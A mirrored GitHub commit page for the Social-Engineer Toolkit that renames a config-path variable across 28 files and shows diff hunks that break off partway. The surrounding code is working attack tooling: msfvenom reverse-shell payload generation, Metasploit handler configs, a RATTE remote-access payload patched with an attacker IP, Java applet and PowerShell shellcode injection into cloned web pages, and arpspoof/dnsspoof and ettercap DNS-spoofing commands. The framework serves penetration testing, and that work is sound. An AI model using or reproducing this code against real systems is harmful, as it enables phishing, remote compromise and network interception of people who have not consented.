mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-10 06:54:18 +00:00
Normalize user config path usage with string append and os.path.join().
This commit is contained in:
parent
a4448ad242
commit
d719ebb8b8
28 changed files with 475 additions and 475 deletions
|
@ -35,7 +35,7 @@ except NameError:
|
|||
pass
|
||||
|
||||
definepath = os.getcwd()
|
||||
setdir = core.userconfigpath
|
||||
userconfigpath = core.userconfigpath
|
||||
|
||||
MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"
|
||||
|
||||
|
@ -100,10 +100,10 @@ def java_applet_attack_tw(website, port, directory, ipaddr):
|
|||
############################################
|
||||
|
||||
# this part is needed to rename the msf.exe file to a randomly generated one
|
||||
if os.path.isfile(os.path.join(setdir, "/rand_gen")):
|
||||
if os.path.isfile(os.path.join(userconfigpath, "rand_gen")):
|
||||
# open the file
|
||||
# start a loop
|
||||
with open(os.path.join(setdir, "rand_gen")) as fileopen:
|
||||
with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:
|
||||
for line in fileopen:
|
||||
# define executable name and rename it
|
||||
filename = line.rstrip()
|
||||
|
@ -111,7 +111,7 @@ def java_applet_attack_tw(website, port, directory, ipaddr):
|
|||
subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait()
|
||||
|
||||
# lastly we need to copy over the signed applet
|
||||
subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (setdir, directory), shell=True).wait()
|
||||
subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait()
|
||||
|
||||
# TODO index.html parsen und IPADDR:Port ersetzen
|
||||
with open(os.path.join(directory, "index.html"), "rb") as fileopen:
|
||||
|
@ -148,7 +148,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
|
|||
############
|
||||
# PATCH Server IP into RATTE
|
||||
############
|
||||
with open(os.path.join(setdir, "ratteM.exe"), 'wb') as filewrite:
|
||||
with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite:
|
||||
|
||||
host = (len(ipaddr) + 1) * "X"
|
||||
r_port = (len(str(ratteport)) + 1) * "Y"
|
||||
|
@ -271,10 +271,10 @@ def main():
|
|||
core.print_info("Starting java applet attack...")
|
||||
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
|
||||
|
||||
with open(os.path.join(setdir, definepath, "/rand_gen")) as fileopen:
|
||||
with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
|
||||
for line in fileopen:
|
||||
ratte_random = line.rstrip()
|
||||
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(setdir, definepath), definepath, ratte_random), shell=True).wait()
|
||||
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
|
||||
|
||||
#######################
|
||||
# start ratteserver
|
||||
|
|
2
seproxy
2
seproxy
|
@ -45,7 +45,7 @@ if operating_system == "posix":
|
|||
else:
|
||||
proxy_string = "export http_proxy='http://{0}'".format(proxy)
|
||||
|
||||
with open(os.path.join(core.userconfigpath, "/proxy.config"), "w") as filewrite:
|
||||
with open(os.path.join(core.userconfigpath, "proxy.config"), "w") as filewrite:
|
||||
filewrite.write(proxy_string)
|
||||
|
||||
def kill_proc(port, flag):
|
||||
|
|
|
@ -33,11 +33,11 @@ if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")):
|
|||
os.path.join(core.userconfigpath, "template.pdf")),
|
||||
shell=True).wait()
|
||||
|
||||
if os.path.isfile(os.path.join(core.userconfigpath, "/dll/openthis.wab")):
|
||||
if os.path.isfile(os.path.join(core.userconfigpath, "dll/openthis.wab")):
|
||||
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
|
||||
"mkdir {0} 1> /dev/null 2> /dev/null;"
|
||||
"cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
|
||||
os.path.join(core.userconfigpath, "/dll/*")),
|
||||
os.path.join(core.userconfigpath, "dll/*")),
|
||||
shell=True).wait()
|
||||
trigger = 3
|
||||
|
||||
|
|
|
@ -105,7 +105,7 @@ if ettercapchoice == 'y':
|
|||
# spawn a child process
|
||||
os.chdir(cwd)
|
||||
time.sleep(5)
|
||||
filewrite = open(setdir + "/ettercap", "w")
|
||||
filewrite = open(userconfigpath + "ettercap", "w")
|
||||
filewrite.write(
|
||||
"ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge))
|
||||
filewrite.close()
|
||||
|
@ -147,8 +147,8 @@ if dsniffchoice == 'y':
|
|||
if dns_spoof == "":
|
||||
dns_spoof = "*"
|
||||
subprocess.Popen(
|
||||
"rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (setdir), shell=True).wait()
|
||||
filewrite = open(setdir + "/dnsspoof.conf", "w")
|
||||
"rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (userconfigpath), shell=True).wait()
|
||||
filewrite = open(userconfigpath + "dnsspoof.conf", "w")
|
||||
filewrite.write("%s %s" % (ipaddr, dns_spoof))
|
||||
filewrite.close()
|
||||
print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!")
|
||||
|
@ -160,10 +160,10 @@ if dsniffchoice == 'y':
|
|||
gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % (
|
||||
interface), shell=True, stdout=subprocess.PIPE).communicate()[0]
|
||||
# open file for writing
|
||||
filewrite = open(setdir + "/ettercap", "w")
|
||||
filewrite = open(userconfigpath + "ettercap", "w")
|
||||
# write the arpspoof / dnsspoof commands to file
|
||||
filewrite.write(
|
||||
"arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, setdir))
|
||||
"arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, userconfigpath))
|
||||
# close the file
|
||||
filewrite.close()
|
||||
# change back to normal directory
|
||||
|
|
|
@ -263,7 +263,7 @@ try:
|
|||
# specify we are using the fasttrack
|
||||
# option, this disables some features
|
||||
filewrite = open(
|
||||
setdir + "/fasttrack.options", "w")
|
||||
userconfigpath + "fasttrack.options", "w")
|
||||
filewrite.write("none")
|
||||
filewrite.close()
|
||||
# import fasttrack
|
||||
|
@ -439,10 +439,10 @@ try:
|
|||
# if we are using the built in one
|
||||
if dict == "":
|
||||
# write out a file
|
||||
filewrite = open(setdir + "/dictionary.txt", "w")
|
||||
filewrite = open(userconfigpath + "dictionary.txt", "w")
|
||||
filewrite.write("\nPassword1\nPassword!\nlc username")
|
||||
# specify the path
|
||||
dict = setdir + "/dictionary.txt"
|
||||
dict = userconfigpath + "dictionary.txt"
|
||||
filewrite.close()
|
||||
|
||||
# if we are not brute forcing
|
||||
|
|
|
@ -53,27 +53,27 @@ attack_vector = 0
|
|||
linosx = 0
|
||||
multiattack = ""
|
||||
# grab attack vector
|
||||
if os.path.isfile(setdir + "/attack_vector"):
|
||||
fileopen = open(setdir + "/attack_vector", "r")
|
||||
if os.path.isfile(userconfigpath + "attack_vector"):
|
||||
fileopen = open(userconfigpath + "attack_vector", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
if line == "java":
|
||||
attack_vector = "java"
|
||||
if line == "multiattack":
|
||||
attack_vector = "multiattack"
|
||||
multiattack = open(setdir + "/multi_payload", "w")
|
||||
multiattack = open(userconfigpath + "multi_payload", "w")
|
||||
|
||||
# here is a place holder for the multi attack java
|
||||
# multiattack outputs a file called multi_java if
|
||||
# this file is present it will allow additional
|
||||
# functionality
|
||||
multiattack_java = "off"
|
||||
if os.path.isfile(setdir + "/multi_java"):
|
||||
if os.path.isfile(userconfigpath + "multi_java"):
|
||||
multiattack_java = "on"
|
||||
|
||||
# custom payloadgen
|
||||
payloadgen = "regular"
|
||||
if os.path.isfile(setdir + "/payloadgen"):
|
||||
if os.path.isfile(userconfigpath + "payloadgen"):
|
||||
payloadgen = "solo"
|
||||
|
||||
#
|
||||
|
@ -117,8 +117,8 @@ try:
|
|||
choice1 = ""
|
||||
# this is port
|
||||
choice3 = ""
|
||||
if os.path.isfile(setdir + "/meterpreter_reverse_tcp_exe"):
|
||||
fileopen = open(setdir + "/meterpreter_reverse_tcp_exe", "r")
|
||||
if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"):
|
||||
fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r")
|
||||
for line in fileopen:
|
||||
# this reads in the first line of the file which happens to be port
|
||||
# when calling through core
|
||||
|
@ -182,7 +182,7 @@ try:
|
|||
encoder = 'false'
|
||||
payloadgen = 'solo'
|
||||
encode_stop = 1
|
||||
filewrite = open(setdir + "/set.payload", "w")
|
||||
filewrite = open(userconfigpath + "set.payload", "w")
|
||||
# select setshell
|
||||
if choice1 == '3':
|
||||
filewrite.write("SETSHELL")
|
||||
|
@ -217,11 +217,11 @@ try:
|
|||
|
||||
# if we are using our own executable
|
||||
if custom == 1:
|
||||
check_write = open(setdir + "/custom.exe", "w")
|
||||
check_write = open(userconfigpath + "custom.exe", "w")
|
||||
check_write.write("VALID")
|
||||
check_write.close()
|
||||
shutil.copyfile("%s" % (choice1), "msf.exe")
|
||||
shutil.copyfile("msf.exe", setdir + "/msf.exe")
|
||||
shutil.copyfile("msf.exe", userconfigpath + "msf.exe")
|
||||
|
||||
# Specify Encoding Option
|
||||
encoder = "false"
|
||||
|
@ -232,12 +232,12 @@ try:
|
|||
if choice1 != "set/reverse_shell":
|
||||
# we need to rewrite index.html real quick because it has a parameter
|
||||
# that could get confusing
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
data = fileopen.read()
|
||||
data = data.replace("freehugs", "")
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
filewrite = open(setdir + "/web_clone/index.html", "w")
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -276,7 +276,7 @@ try:
|
|||
# if we are using the SET interactive shell then do this
|
||||
if choice1 == "set/reverse_shell":
|
||||
encoder = "false"
|
||||
filewrite = open(setdir + "/set.payload.posix", "w")
|
||||
filewrite = open(userconfigpath + "set.payload.posix", "w")
|
||||
filewrite.write("true")
|
||||
filewrite.close()
|
||||
import src.core.payloadprep
|
||||
|
@ -330,7 +330,7 @@ try:
|
|||
|
||||
if choice1 == "shellcode/alphanum":
|
||||
print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...")
|
||||
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, setdir), shell=True).wait()
|
||||
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait()
|
||||
|
||||
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi":
|
||||
# here we update set options to specify pyinjection and multipy
|
||||
|
@ -339,16 +339,16 @@ try:
|
|||
# define, this will eventually be all of our payloads
|
||||
multipyinject_payload = ""
|
||||
# clean up old file
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
os.remove("%s/meta_config_multipyinjector" % (setdir))
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
|
||||
os.remove("%s/meta_config_multipyinjector" % (userconfigpath))
|
||||
|
||||
# remove any old payload options
|
||||
if os.path.isfile(setdir + "/payload.options.shellcode"):
|
||||
os.remove(setdir + "/payload_options.shellcode")
|
||||
if os.path.isfile(userconfigpath + "payload.options.shellcode"):
|
||||
os.remove(userconfigpath + "payload_options.shellcode")
|
||||
|
||||
# this is the file that gets saved with the payload and
|
||||
# port options
|
||||
if choice1 != "cmd/multi": payload_options = open(setdir + "/payload_options.shellcode", "a")
|
||||
if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a")
|
||||
|
||||
while 1:
|
||||
# don't need any options here
|
||||
|
@ -385,8 +385,8 @@ try:
|
|||
|
||||
# here we prep our meta config to listen on all
|
||||
# the ports we want - free hugs all around
|
||||
filewrite = open("%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port)
|
||||
filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a")
|
||||
port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port)
|
||||
if port_check == False:
|
||||
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port))
|
||||
filewrite.close()
|
||||
|
@ -453,7 +453,7 @@ try:
|
|||
shellcode = encryptAES(secret, multipyinject_payload)
|
||||
print_status("Dynamic cipher key created and embedded into payload.")
|
||||
|
||||
filewrite = open("%s/meterpreter.alpha_decoded" % (setdir), "w")
|
||||
filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w")
|
||||
filewrite.write(shellcode)
|
||||
filewrite.close()
|
||||
|
||||
|
@ -462,7 +462,7 @@ try:
|
|||
payload_options.close()
|
||||
|
||||
# here we are going to encode the payload via base64
|
||||
fileopen = open("%s/meterpreter.alpha_decoded" % (setdir), "r")
|
||||
fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r")
|
||||
data = fileopen.read()
|
||||
if payloadgen != "solo":
|
||||
# base64 1
|
||||
|
@ -489,7 +489,7 @@ try:
|
|||
# last one
|
||||
data = base64.b64encode(b'data')
|
||||
#
|
||||
filewrite = open("%s/meterpreter.alpha" % (setdir), "w")
|
||||
filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w")
|
||||
filewrite.write(str(data))
|
||||
filewrite.close()
|
||||
if choice1 == "shellcode/alphanum":
|
||||
|
@ -510,17 +510,17 @@ try:
|
|||
|
||||
# write out the payload
|
||||
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject":
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
filewrite.write(fileopen)
|
||||
filewrite.close()
|
||||
|
||||
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait()
|
||||
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
|
||||
# we need to read in the old index.html file because its
|
||||
# already generated, need to present the alphanum to it
|
||||
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
|
||||
fileopen = open("%s/web_clone/index.html" %(setdir), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
|
||||
fileopen2 = open("%s/meterpreter.alpha" % (setdir), "r")
|
||||
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
|
||||
fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
|
||||
fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r")
|
||||
alpha_shellcode = fileopen2.read().rstrip()
|
||||
data = fileopen.read()
|
||||
data = data.replace(
|
||||
|
@ -539,7 +539,7 @@ try:
|
|||
if choice1 == "shellcode/pyinject":
|
||||
print_status("Prepping website for pyInjector shellcode injection..")
|
||||
print_status("Base64 encoding shellcode and prepping for delivery..")
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
|
||||
if choice9 == "windows/meterpreter/reverse_tcp_allports":
|
||||
portnum = "LPORT=1"
|
||||
choice3 = "1"
|
||||
|
@ -551,7 +551,7 @@ try:
|
|||
choice1 = choice9
|
||||
|
||||
# write out the payload for powershell injection to pick it up if used
|
||||
filewrite = open(setdir + "/metasploit.payload", "w")
|
||||
filewrite = open(userconfigpath + "metasploit.payload", "w")
|
||||
filewrite.write(choice1)
|
||||
filewrite.close()
|
||||
# import if on
|
||||
|
@ -563,12 +563,12 @@ try:
|
|||
setshell_counter = 1
|
||||
if setshell_counter == 0:
|
||||
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
|
||||
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
|
||||
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
|
||||
if choice1 != "cmd/multi":
|
||||
try: core.module_reload(src.payloads.powershell.prep)
|
||||
except: import src.payloads.powershell.prep
|
||||
if os.path.isfile("%s/x86.powershell" % (setdir)):
|
||||
fileopen1 = open("%s/x86.powershell" % (setdir), "r")
|
||||
if os.path.isfile("%s/x86.powershell" % (userconfigpath)):
|
||||
fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r")
|
||||
x86 = fileopen1.read()
|
||||
x86 = "powershell -ec " + x86
|
||||
|
||||
|
@ -586,8 +586,8 @@ try:
|
|||
print_status("Embedding commands into Java Applet parameters...")
|
||||
print_status("Note that these will be base64-encoded once, regardless of the payload..")
|
||||
|
||||
fileopen3 = open("%s/web_clone/index.html" % (setdir), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
|
||||
fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
|
||||
data = fileopen3.read()
|
||||
|
||||
# encode once, will need to decode later
|
||||
|
@ -605,19 +605,19 @@ try:
|
|||
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, shell=True).wait()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait()
|
||||
|
||||
# here we specify the binary to deploy if we are using ones that are
|
||||
# required to drop binaries
|
||||
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi":
|
||||
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
|
||||
fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
|
||||
data = fileopen3.read()
|
||||
# check if we don't want to deploy binaries
|
||||
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
|
||||
|
||||
# specify attack vector as SET interactive shell
|
||||
if choice1 == "set/reverse_shell":
|
||||
|
@ -657,7 +657,7 @@ try:
|
|||
|
||||
if osx_path != "":
|
||||
# copy the payload
|
||||
shutil.copyfile(osx_path, setdir + "/mac.bin")
|
||||
shutil.copyfile(osx_path, userconfigpath + "mac.bin")
|
||||
|
||||
# if linux payload
|
||||
if lin_path != "":
|
||||
|
@ -672,7 +672,7 @@ try:
|
|||
|
||||
if lin_path != "":
|
||||
# copy the payload
|
||||
shutil.copyfile(lin_path, setdir + "/nix.bin")
|
||||
shutil.copyfile(lin_path, userconfigpath + "nix.bin")
|
||||
|
||||
else:
|
||||
|
||||
|
@ -680,9 +680,9 @@ try:
|
|||
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
|
||||
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
|
||||
print_status("Generating OSX payloads through Metasploit...")
|
||||
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
print_status("Generating Linux payloads through Metasploit...")
|
||||
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
if multiattack_java == "on":
|
||||
multiattack.write("OSX=" + str(port1) + "\n")
|
||||
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
|
||||
|
@ -691,24 +691,24 @@ try:
|
|||
|
||||
osxcheck = check_options("MAC.BIN=")
|
||||
linuxcheck = check_options("NIX.BIN=")
|
||||
shutil.copyfile(setdir + "/mac.bin", setdir + "/web_clone/%s" % (osxcheck))
|
||||
shutil.copyfile(setdir + "/nix.bin", setdir + "/web_clone/%s" % (linuxcheck))
|
||||
shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck))
|
||||
shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck))
|
||||
|
||||
# try block here
|
||||
try:
|
||||
# if they want a listener, start here
|
||||
if os.path.isfile("%s/meta_config" % (setdir)):
|
||||
if os.path.isfile("%s/meta_config" % (userconfigpath)):
|
||||
# if its already created
|
||||
filewrite = open("%s/meta_config" % (setdir), "a")
|
||||
filewrite = open("%s/meta_config" % (userconfigpath), "a")
|
||||
|
||||
if not os.path.isfile("%s/meta_config" % (setdir)):
|
||||
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
|
||||
# if we need to create it
|
||||
filewrite = open("%s/meta_config" % (setdir), "w")
|
||||
filewrite = open("%s/meta_config" % (userconfigpath), "w")
|
||||
|
||||
# if there isn't a multiattack metasploit, setup handler
|
||||
if not os.path.isfile("%s/multi_meta" % (setdir)):
|
||||
if not os.path.isfile("%s/multi_meta" % (userconfigpath)):
|
||||
|
||||
port_check = check_ports("%s/meta_config" % (setdir), choice3)
|
||||
port_check = check_ports("%s/meta_config" % (userconfigpath), choice3)
|
||||
if port_check == False:
|
||||
filewrite.write("use exploit/multi/handler\n")
|
||||
filewrite.write("set PAYLOAD " + choice1 + "\n")
|
||||
|
@ -726,10 +726,10 @@ try:
|
|||
|
||||
# config option for using multiscript meterpreter
|
||||
if meterpreter_multi == "ON":
|
||||
multiwrite = open(setdir + "/multi_meter.file", "w")
|
||||
multiwrite = open(userconfigpath + "multi_meter.file", "w")
|
||||
multiwrite.write(meterpreter_multi_command)
|
||||
filewrite.write(
|
||||
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir))
|
||||
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
|
||||
multiwrite.close()
|
||||
filewrite.write("exploit -j\r\n\r\n")
|
||||
|
||||
|
@ -759,10 +759,10 @@ try:
|
|||
filewrite.write("set LPORT " + port2 + "\n")
|
||||
if linux_meterpreter_multi == "ON":
|
||||
multiwrite = open(
|
||||
setdir + "/lin_multi_meter.file", "w")
|
||||
userconfigpath + "lin_multi_meter.file", "w")
|
||||
multiwrite.write(linux_meterpreter_multi_command)
|
||||
filewrite.write(
|
||||
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (setdir))
|
||||
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath))
|
||||
multiwrite.close()
|
||||
filewrite.write("set ExitOnSession false\n")
|
||||
filewrite.write("exploit -j\r\n\r\n")
|
||||
|
@ -781,11 +781,11 @@ except KeyboardInterrupt:
|
|||
# finish closing up the remenant files
|
||||
if attack_vector == "multiattack":
|
||||
multiattack.close()
|
||||
if os.path.isfile("%s/fileformat.file" % (setdir)):
|
||||
filewrite = open("%s/payload.options" % (setdir), "w")
|
||||
if os.path.isfile("%s/fileformat.file" % (userconfigpath)):
|
||||
filewrite = open("%s/payload.options" % (userconfigpath), "w")
|
||||
filewrite.write(choice1 + " " + ipaddr + " " + choice3)
|
||||
filewrite.close()
|
||||
|
||||
if choice1 == "set/reverse_shell":
|
||||
if os.path.isfile(setdir + "/meta_config"):
|
||||
os.remove(setdir + "/meta_config")
|
||||
if os.path.isfile(userconfigpath + "meta_config"):
|
||||
os.remove(userconfigpath + "meta_config")
|
||||
|
|
|
@ -16,14 +16,14 @@ meta_path = meta_path()
|
|||
def payload_generate(payload, lhost, port):
|
||||
# generate metasploit
|
||||
subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" %
|
||||
(payload, lhost, port, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
|
||||
(payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
|
||||
# write out the rc file
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
filewrite = open(userconfigpath + "meta_config", "w")
|
||||
filewrite.write(
|
||||
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port))
|
||||
filewrite.close()
|
||||
print_status(
|
||||
"Payload has been exported to the default SET directory located under: " + setdir + "/payload.exe")
|
||||
"Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe")
|
||||
|
||||
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
|
||||
payload = (raw_input(setprompt(["4"], "")))
|
||||
|
@ -49,4 +49,4 @@ if check_options("INFECTION_MEDIA=") != "ON":
|
|||
print_status(
|
||||
"Launching msfconsole, this could take a few to load. Be patient...")
|
||||
subprocess.Popen(meta_path + "msfconsole -r " +
|
||||
setdir + "/meta_config", shell=True).wait()
|
||||
userconfigpath + "meta_config", shell=True).wait()
|
||||
|
|
|
@ -43,12 +43,12 @@ for line in fileopen:
|
|||
"\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")
|
||||
|
||||
# make directory if it's not there
|
||||
if not os.path.isdir(setdir + "/web_clone/"):
|
||||
os.makedirs(setdir + "/web_clone/")
|
||||
if not os.path.isdir(userconfigpath + "web_clone/"):
|
||||
os.makedirs(userconfigpath + "web_clone/")
|
||||
|
||||
# grab ip address and SET web server interface
|
||||
if os.path.isfile(setdir + "/interface"):
|
||||
fileopen = open(setdir + "interface", "r")
|
||||
if os.path.isfile(userconfigpath + "interface"):
|
||||
fileopen = open(userconfigpath + "interface", "r")
|
||||
for line in fileopen:
|
||||
ipaddr = line.rstrip()
|
||||
|
||||
|
@ -94,8 +94,8 @@ webserver = exe_name + " " + webserver
|
|||
|
||||
# this is generated through payloadgen.py and lets SET know if its a RATTE
|
||||
# payload or SET payload
|
||||
if os.path.isfile(setdir + "/set.payload"):
|
||||
fileopen = open(setdir + "/set.payload", "r")
|
||||
if os.path.isfile(userconfigpath + "set.payload"):
|
||||
fileopen = open(userconfigpath + "set.payload", "r")
|
||||
for line in fileopen:
|
||||
payload_selection = line.rstrip()
|
||||
else:
|
||||
|
@ -105,7 +105,7 @@ else:
|
|||
# determine if we want to target osx/nix as well
|
||||
posix = False
|
||||
# find if we selected it
|
||||
if os.path.isfile(setdir + "/set.payload.posix"):
|
||||
if os.path.isfile(userconfigpath + "set.payload.posix"):
|
||||
# if we have then claim true
|
||||
posix = True
|
||||
|
||||
|
@ -114,20 +114,20 @@ if payload_selection == "SETSHELL":
|
|||
# replace ipaddress with one that we need for reverse connection back
|
||||
fileopen = open("src/payloads/set_payloads/downloader.windows", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
host = int(len(exe_name) + 1) * "X"
|
||||
webserver_count = int(len(webserver) + 1) * "S"
|
||||
ipaddr_count = int(len(ipaddr) + 1) * "M"
|
||||
filewrite.write(data.replace(str(host), exe_name + "\x00", 1))
|
||||
filewrite.close()
|
||||
fileopen = open(setdir + "/msf.exe", "rb")
|
||||
fileopen = open(userconfigpath + "msf.exe", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
